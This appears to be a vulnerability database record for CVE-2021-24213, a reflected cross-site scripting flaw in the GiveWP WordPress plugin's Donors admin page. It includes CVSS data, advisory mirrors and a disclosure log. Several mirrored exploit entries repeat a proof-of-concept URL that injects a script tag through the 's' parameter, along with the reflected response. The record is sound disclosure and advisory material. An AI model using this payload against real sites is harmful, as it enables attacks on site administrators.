DATABASE RESOURCES PRICING ABOUT US

{"id": "CVE-2021-24213", "vendorId": null, "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2021-24213", "description": "The GiveWP \u00e2\u20ac\u201c Donation Plugin and Fundraising Platform WordPress plugin before 2.10.0 was affected by a reflected Cross-Site Scripting vulnerability inside of the administration panel, via the 's' GET parameter on the Donors page.", "published": "2021-04-12T14:15:00", "modified": "2021-04-20T00:16:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "accessVector": "NETWORK", "accessComplexity": "MEDIUM", "authentication": "NONE", "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "availabilityImpact": "NONE", "baseScore": 4.3}, "severity": "MEDIUM", "exploitabilityScore": 8.6, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": true}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-24213", "reporter": "contact@wpscan.com", "references": ["https://wpscan.com/vulnerability/da4ab508-a423-4c7f-a1d4-42ec6f989309", "https://bentl.ee/posts/cve-givewp/"], "cvelist": ["CVE-2021-24213"], "immutableFields": [], "lastseen": "2022-03-23T14:49:29", "viewCount": 22, "enchantments": {"dependencies": {"references": [{"type": "packetstorm", "idList": ["PACKETSTORM:161933"]}, {"type": "wpexploit", "idList": ["WPEX-ID:DA4AB508-A423-4C7F-A1D4-42EC6F989309"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:DA4AB508-A423-4C7F-A1D4-42EC6F989309"]}, {"type": "zdt", "idList": ["1337DAY-ID-36018"]}], "rev": 4}, "score": {"value": 3.6, "vector": "NONE"}, "backreferences": {"references": [{"type": "packetstorm", "idList": ["PACKETSTORM:161933"]}, {"type": "wpexploit", "idList": ["WPEX-ID:DA4AB508-A423-4C7F-A1D4-42EC6F989309"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:DA4AB508-A423-4C7F-A1D4-42EC6F989309"]}, {"type": "zdt", "idList": ["1337DAY-ID-36018"]}]}, "exploitation": null, "vulnersScore": 3.6}, "_state": {"dependencies": 0}, "_internal": {}, "cna_cvss": {"cna": null, "cvss": {}}, "cpe": [], "cpe23": [], "cwe": ["CWE-79"], "affectedSoftware": [{"cpeName": "givewp:give", "version": "2.10.0", "operator": "lt", "name": "givewp give"}], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"operator": "OR", "children": [], "cpe_match": [{"vulnerable": true, "cpe23Uri": "cpe:2.3:a:givewp:give:2.10.0:*:*:*:*:wordpress:*:*", "versionStartIncluding": "2.4.0", "versionEndExcluding": "2.10.0", "cpe_name": []}]}]}, "extraReferences": [{"url": "https://wpscan.com/vulnerability/da4ab508-a423-4c7f-a1d4-42ec6f989309", "name": "https://wpscan.com/vulnerability/da4ab508-a423-4c7f-a1d4-42ec6f989309", "refsource": "CONFIRM", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://bentl.ee/posts/cve-givewp/", "name": "https://bentl.ee/posts/cve-givewp/", "refsource": "MISC", "tags": ["Exploit", "Third Party Advisory"]}]}

{"zdt": [{"lastseen": "2021-10-05T22:45:42", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 2.7}, "published": "2021-03-23T00:00:00", "type": "zdt", "title": "WordPress GiveWP 2.9.7 Cross Site Scripting Vulnerability", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24213"], "modified": "2021-03-23T00:00:00", "id": "1337DAY-ID-36018", "href": "https://0day.today/exploit/description/36018", "sourceData": "# Exploit Title: GiveWP 2.9.7 Reflected Cross-Site Scripting\r\n# Exploit Author: Austin Bentley\r\n# Vendor Homepage: https://givewp.com/\r\n# Software Link: https://wordpress.org/plugins/give/\r\n# Version: 2.9.7\r\n# Tested on: Windows 7\r\n# CVE: CVE-2021-24213\r\nExploitation requirements: Admin must visit payload URL. Default config.\r\nTested on: GiveWP 2.9.7, Wordpress 5.7, XAMPP 7.4.16, Firefox 86.0.1. Default configs on all products.\r\nVulnerable since: 2.4.0, Jan 16th 2019, commit 097c4d0ab964493776950381ed64498040395f6b\r\nActive Installations: 100,000+ per https://wordpress.org/plugins/give/\r\nResearcher: Austin Bentley (https://bentl.ee/)\r\nDetailed writeup available at httpS://bentl.ee/posts/cve-givewp/\r\n\r\nPoC URL:\r\nhttp://localhost/wp-admin/edit.php?s=%22%3E<script>alert(0)</script>&start-date&end-date&form_id=0&action=-1&paged=1&give_action=delete_bulk_donor&orderby=id&order=DESC&action2=-1&post_type=give_forms&page=give-donors&view=donors\r\n\r\nResponse:\r\n--- SNIP ---\r\n<div class=\"give-donor-search-box\">\r\n <input type=\"text\" id=\"give-donors-search-input\" placeholder=\"Name, Email, or Donor ID\" name=\"s\" value=\"\\\"><script>alert(0)</script>\">\r\n <input type=\"submit\" class=\"button\" value=\"Search\" ID=\"donor-search-submit\" />\r\n</div>\r\n--- SNIP ---\r\n\r\n\r\nDisclosure Log:\r\n3/21/2021 -- Emailed GiveWP for security contact information\r\n3/22/2021 -- WPScan CNA issued CVE-2021-24213 (un-released)\r\n3/22/2021 -- Provided vendor with PoC\r\n3/22/2021 -- Vendor provided fix in 2.10.0\r\n3/23/2021 -- Fix validated, article posted, CVE unlocked\n\n# 0day.today [2021-10-06] #", "sourceHref": "https://0day.today/exploit/36018", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "wpvulndb": [{"lastseen": "2021-04-20T23:25:47", "description": "The plugin was affected by a reflected Cross-Site Scripting vulnerability inside of the administration panel, via the 's' GET parameter on the Donors page.\n\n### PoC\n\nhttps://example.com/wp-admin/edit.php?s=%22%3E&amp;start-date;&amp;end-date;&amp;form;_id=0&amp;action;=-1&amp;paged;=1&amp;give;_action=delete_bulk_donor&amp;orderby;=id&amp;order;=DESC&amp;action2;=-1&amp;post;_type=give_forms&amp;page;=give-donors&amp;view;=donors \n", "cvss3": {}, "published": "2021-03-23T00:00:00", "type": "wpvulndb", "title": "GiveWP < 2.10.0 - Reflected Cross Site Scripting (XSS)", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2021-24213"], "modified": "2021-03-24T06:00:56", "id": "WPVDB-ID:DA4AB508-A423-4C7F-A1D4-42EC6F989309", "href": "https://wpscan.com/vulnerability/da4ab508-a423-4c7f-a1d4-42ec6f989309", "sourceData": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "patchstack": [{"lastseen": "2022-06-01T19:33:04", "description": "Reflected Cross-Site Scripting (XSS) vulnerability discovered by Austin Bentley in WordPress GiveWP plugin (versions <= 2.9.7).\n\n## Solution\n\n\r\n Update the WordPress GiveWP plugin to the latest available version (at least 2.10.0).\r\n ", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2021-03-23T00:00:00", "type": "patchstack", "title": "WordPress GiveWP plugin <= 2.9.7 - Reflected Cross-Site Scripting (XSS) vulnerability", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24213"], "modified": "2021-03-23T00:00:00", "id": "PATCHSTACK:1292BA209C5326D15C3947F835273E44", "href": "https://patchstack.com/database/vulnerability/give/wordpress-givewp-plugin-2-9-7-reflected-cross-site-scripting-xss-vulnerability", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "wpexploit": [{"lastseen": "2021-04-20T23:25:47", "description": "The plugin was affected by a reflected Cross-Site Scripting vulnerability inside of the administration panel, via the 's' GET parameter on the Donors page.\n", "cvss3": {}, "published": "2021-03-23T00:00:00", "type": "wpexploit", "title": "GiveWP < 2.10.0 - Reflected Cross Site Scripting (XSS)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-24213"], "modified": "2021-03-24T06:00:56", "id": "WPEX-ID:DA4AB508-A423-4C7F-A1D4-42EC6F989309", "href": "", "sourceData": "https://example.com/wp-admin/edit.php?s=%22%3E<script>alert(0)</script>&start-date&end-date&form_id=0&action=-1&paged=1&give_action=delete_bulk_donor&orderby=id&order=DESC&action2=-1&post_type=give_forms&page=give-donors&view=donors\r\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "packetstorm": [{"lastseen": "2021-03-23T16:45:00", "description": "", "published": "2021-03-23T00:00:00", "type": "packetstorm", "title": "WordPress GiveWP 2.9.7 Cross Site Scripting", "bulletinFamily": "exploit", "cvelist": ["CVE-2021-24213"], "modified": "2021-03-23T00:00:00", "id": "PACKETSTORM:161933", "href": "https://packetstormsecurity.com/files/161933/WordPress-GiveWP-2.9.7-Cross-Site-Scripting.html", "sourceData": "`# Exploit Title: GiveWP 2.9.7 Reflected Cross-Site Scripting \n# Date: 3/23/2021 \n# Exploit Author: Austin Bentley \n# Vendor Homepage: https://givewp.com/ \n# Software Link: https://wordpress.org/plugins/give/ \n# Version: 2.9.7 \n# Tested on: Windows 7 \n# CVE: CVE-2021-24213 \nExploitation requirements: Admin must visit payload URL. Default config. \nTested on: GiveWP 2.9.7, Wordpress 5.7, XAMPP 7.4.16, Firefox 86.0.1. Default configs on all products. \nVulnerable since: 2.4.0, Jan 16th 2019, commit 097c4d0ab964493776950381ed64498040395f6b \nActive Installations: 100,000+ per https://wordpress.org/plugins/give/ \nResearcher: Austin Bentley (https://bentl.ee/) \nDetailed writeup available at httpS://bentl.ee/posts/cve-givewp/ \n \nPoC URL: \nhttp://localhost/wp-admin/edit.php?s=%22%3E<script>alert(0)</script>&start-date&end-date&form_id=0&action=-1&paged=1&give_action=delete_bulk_donor&orderby=id&order=DESC&action2=-1&post_type=give_forms&page=give-donors&view=donors \n \nResponse: \n--- SNIP --- \n<div class=\"give-donor-search-box\"> \n<input type=\"text\" id=\"give-donors-search-input\" placeholder=\"Name, Email, or Donor ID\" name=\"s\" value=\"\\\"><script>alert(0)</script>\"> \n<input type=\"submit\" class=\"button\" value=\"Search\" ID=\"donor-search-submit\" /> \n</div> \n--- SNIP --- \n \n \nDisclosure Log: \n3/21/2021 -- Emailed GiveWP for security contact information \n3/22/2021 -- WPScan CNA issued CVE-2021-24213 (un-released) \n3/22/2021 -- Provided vendor with PoC \n3/22/2021 -- Vendor provided fix in 2.10.0 \n3/23/2021 -- Fix validated, article posted, CVE unlocked \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/161933/wpgivewp297-xss.txt"}]}